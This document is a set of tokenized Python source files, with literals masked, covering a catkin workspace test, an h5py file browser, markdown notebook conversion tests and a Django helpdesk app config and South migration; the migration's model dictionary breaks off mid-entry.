<s> import os <EOL> import shutil <EOL> from test . utils import AbstractCatkinWorkspaceTest , TEMP_DIR , rosinstall , create_catkin_workspace <EOL> class AbstractUnstableTest ( AbstractCatkinWorkspaceTest ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , testCaseName , name ) : <EOL> super ( AbstractUnstableTest , self ) . __init__ ( <EOL> testCaseName , os . path . join ( TEMP_DIR , name ) ) <EOL> def setupWorkspaceContents ( self ) : <EOL> rosinstall ( self . workspacedir , <EOL> os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) ) <EOL> create_catkin_workspace ( self . workspacedir ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def delete_build ( self ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isdir ( self . builddir ) : <EOL> shutil . rmtree ( self . builddir ) </s>
<s> """<STR_LIT>""" <EOL> import h5py <EOL> from collections import namedtuple <EOL> import operator <EOL> import os <EOL> ItemInfo = namedtuple ( '<STR_LIT>' , [ '<STR_LIT:path>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def format_size ( num_bytes ) : <EOL> """<STR_LIT>""" <EOL> num_bytes = float ( num_bytes ) <EOL> KiB = <NUM_LIT> <EOL> MiB = KiB * KiB <EOL> GiB = KiB * MiB <EOL> TiB = KiB * GiB <EOL> PiB = KiB * TiB <EOL> EiB = KiB * PiB <EOL> ZiB = KiB * EiB <EOL> YiB = KiB * ZiB <EOL> if num_bytes > YiB : <EOL> output = '<STR_LIT>' % ( num_bytes / YiB ) <EOL> elif num_bytes > ZiB : <EOL> output = '<STR_LIT>' % ( num_bytes / ZiB ) <EOL> elif num_bytes > EiB : <EOL> output = '<STR_LIT>' % ( num_bytes / EiB ) <EOL> elif num_bytes > PiB : <EOL> output = '<STR_LIT>' % ( num_bytes / PiB ) <EOL> elif num_bytes > TiB : <EOL> output = '<STR_LIT>' % ( num_bytes / TiB ) <EOL> elif num_bytes > GiB : <EOL> output = '<STR_LIT>' % ( num_bytes / GiB ) <EOL> elif num_bytes > MiB : <EOL> output = '<STR_LIT>' % ( num_bytes / MiB ) <EOL> elif num_bytes > KiB : <EOL> output = '<STR_LIT>' % ( num_bytes / KiB ) <EOL> else : <EOL> output = '<STR_LIT>' % num_bytes <EOL> return output <EOL> class Item ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file , parent , name , itemtype , ** kwargs ) : <EOL> self . file = file <EOL> self . parent = parent <EOL> self . name = name <EOL> self . itemtype = itemtype <EOL> self . _children = { } <EOL> self . kwargs = kwargs <EOL> parentnm = parent . fullname <EOL> if parentnm . endswith ( '<STR_LIT:/>' ) : <EOL> parentnm = parentnm [ : - <NUM_LIT:1> ] <EOL> self . fullname = '<STR_LIT:/>' . join ( [ parentnm , name ] ) <EOL> def _add_child ( self , name , child ) : <EOL> """<STR_LIT>""" <EOL> self . _children [ name ] = child <EOL> def children ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _children . keys ( ) <EOL> def get ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if name in self . 
_attrs ( ) : <EOL> return self . _attr ( name ) <EOL> if '<STR_LIT:/>' in name : <EOL> parent , child = os . path . split ( name ) <EOL> return self . get ( parent ) . get ( child ) <EOL> else : <EOL> return self . _children . get ( name ) <EOL> def __getattr__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> val = self . get ( name ) <EOL> if val is None : <EOL> val = self . kwargs . get ( name ) <EOL> return val <EOL> def __dir__ ( self ) : <EOL> """<STR_LIT>""" <EOL> d = self . _children . keys ( ) <EOL> d . extend ( self . _attrs ( ) ) <EOL> d . extend ( self . kwargs ) <EOL> return sorted ( d ) <EOL> def item ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . file . f . get ( self . fullname ) <EOL> def __getitem__ ( self , i ) : <EOL> """<STR_LIT>""" <EOL> if self . itemtype == '<STR_LIT>' : <EOL> return self . item ( ) [ i ] <EOL> def _attr ( self , name ) : <EOL> """<STR_LIT>""" <EOL> item = self . item ( ) <EOL> return item . attrs [ name ] <EOL> def _attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> return sorted ( self . item ( ) . attrs . keys ( ) ) <EOL> def _get_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . itemtype == '<STR_LIT>' : <EOL> s = self . fullname <EOL> elif self . itemtype == '<STR_LIT>' : <EOL> item = self . file . f . get ( self . fullname ) <EOL> shape , dtype = str ( item . shape ) , str ( item . dtype ) <EOL> try : <EOL> nbytes = item . dtype . itemsize * item . size <EOL> except : <EOL> nbytes = item . dtype . itemsize * item . len ( ) <EOL> s = '<STR_LIT>' . format ( <EOL> self . fullname , shape , dtype , format_size ( nbytes ) ) <EOL> for attr in self . _attrs ( ) : <EOL> val = self . get ( attr ) <EOL> s += '<STR_LIT>' . format ( attr , val ) <EOL> return s <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> repr = self . _get_repr ( ) <EOL> for child in self . _children : <EOL> repr = repr + "<STR_LIT:\n>" <EOL> repr += self . get ( child ) . 
__repr__ ( ) <EOL> return repr <EOL> class Dataset ( Item ) : <EOL> def __init__ ( self , file , parent , name ) : <EOL> super ( Dataset , self ) . __init__ ( file , parent , name , '<STR_LIT>' ) <EOL> class Group ( Item ) : <EOL> def __init__ ( self , file , parent , name ) : <EOL> super ( Group , self ) . __init__ ( file , parent , name , '<STR_LIT>' ) <EOL> class File ( Item ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename = None ) : <EOL> self . fullname = '<STR_LIT:/>' <EOL> super ( File , self ) . __init__ ( self , self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . filename = filename <EOL> self . f = None <EOL> self . iteminfos = [ ] <EOL> self . open ( ) <EOL> def open ( self , filename = None ) : <EOL> """<STR_LIT>""" <EOL> if filename is None : <EOL> filename = self . filename <EOL> else : <EOL> self . filename = filename <EOL> if self . f is None and filename is not None : <EOL> self . f = h5py . File ( filename , '<STR_LIT:r>' ) <EOL> self . _visit ( ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . f is not None : <EOL> self . f . close ( ) <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def __exit__ ( self , type , value , tb ) : <EOL> """<STR_LIT>""" <EOL> self . close ( ) <EOL> def _visit_item ( self , name ) : <EOL> """<STR_LIT>""" <EOL> item = self . f . get ( name ) <EOL> if isinstance ( item , h5py . Dataset ) : <EOL> itemtype = '<STR_LIT>' <EOL> shape , dtype = item . shape , item . dtype <EOL> elif isinstance ( item , h5py . Group ) : <EOL> itemtype = '<STR_LIT>' <EOL> shape , dtype = None , None <EOL> self . iteminfos . append ( ItemInfo ( name , itemtype , shape , dtype ) ) <EOL> if '<STR_LIT:/>' not in name : <EOL> self . _children [ name ] = Item ( self , self , name , itemtype , shape = shape , dtype = dtype ) <EOL> else : <EOL> parentnm , childnm = os . path . split ( name ) <EOL> parent = self . 
get ( parentnm ) <EOL> child = Item ( self , parent , childnm , itemtype , shape = shape , dtype = dtype ) <EOL> parent . _add_child ( childnm , child ) <EOL> def _visit ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . f is not None : <EOL> self . f . visit ( self . _visit_item ) <EOL> self . iteminfos = sorted ( self . iteminfos , key = operator . itemgetter ( <NUM_LIT:0> ) ) <EOL> return self . iteminfos <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> filename = os . path . realpath ( self . filename ) <EOL> s = '<STR_LIT>' . format ( <EOL> filename , format_size ( os . path . getsize ( filename ) ) ) <EOL> s += super ( File , self ) . __repr__ ( ) <EOL> return s <EOL> def open ( filename ) : <EOL> """<STR_LIT>""" <EOL> return File ( filename ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> filename = '<STR_LIT>' <EOL> if not os . path . exists ( filename ) : <EOL> import create <EOL> with open ( filename ) as f : <EOL> print ( "<STR_LIT>" ) <EOL> print ( f ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( f . MyAttr ) <EOL> print ( f . MyGroup2 ) <EOL> print ( f . MyGroup2 . MyDataset1 [ <NUM_LIT:2> : <NUM_LIT:4> , <NUM_LIT:3> : <NUM_LIT:5> ] ) <EOL> print ( f . MyGroup1 . MyGroup11 . get ( '<STR_LIT>' ) [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> : <NUM_LIT:3> ] ) </s>
<s> """<STR_LIT>""" <EOL> from ... core . format_manager import format_manager , convert <EOL> from ... utils . utils import _diff , _show_outputs <EOL> from . _utils import ( _test_reader , _test_writer , <EOL> _exec_test_file , _read_test_file ) <EOL> def _test_markdown_reader ( basename , ignore_notebook_meta = False ) : <EOL> """<STR_LIT>""" <EOL> converted , expected = _test_reader ( basename , '<STR_LIT>' , <EOL> ignore_notebook_meta ) <EOL> assert converted == expected <EOL> def _test_markdown_writer ( basename ) : <EOL> """<STR_LIT>""" <EOL> converted , expected = _test_writer ( basename , '<STR_LIT>' ) <EOL> assert _diff ( converted , expected ) == '<STR_LIT>' <EOL> def _test_markdown_markdown ( basename ) : <EOL> """<STR_LIT>""" <EOL> contents = _read_test_file ( basename , '<STR_LIT>' ) <EOL> cells = convert ( contents , from_ = '<STR_LIT>' ) <EOL> converted = convert ( cells , to = '<STR_LIT>' ) <EOL> assert _diff ( contents , converted ) == '<STR_LIT>' <EOL> def test_markdown_reader ( ) : <EOL> _test_markdown_reader ( '<STR_LIT>' ) <EOL> _test_markdown_reader ( '<STR_LIT>' ) <EOL> _test_markdown_reader ( '<STR_LIT>' ) <EOL> _test_markdown_reader ( '<STR_LIT>' , ignore_notebook_meta = False ) <EOL> def test_markdown_writer ( ) : <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> _test_markdown_writer ( '<STR_LIT>' ) <EOL> def test_markdown_markdown ( ) : <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> _test_markdown_markdown ( '<STR_LIT>' ) <EOL> def test_decorator ( ) : <EOL> """<STR_LIT>""" <EOL> markdown = '<STR_LIT:\n>' . 
join ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> cells = convert ( markdown , from_ = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in cells [ <NUM_LIT:0> ] [ '<STR_LIT:input>' ] <EOL> assert cells [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> markdown_bis = convert ( cells , to = '<STR_LIT>' ) <EOL> assert _diff ( markdown , markdown_bis . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' </s>
<s> from django . apps import AppConfig <EOL> class HelpdeskConfig ( AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = "<STR_LIT>" </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> from helpdesk . settings import HAS_TAG_SUPPORT <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> if HAS_TAG_SUPPORT : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> if HAS_TAG_SUPPORT : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:max_length>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:html>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' 
: ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , 
'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' 
} ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:5>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 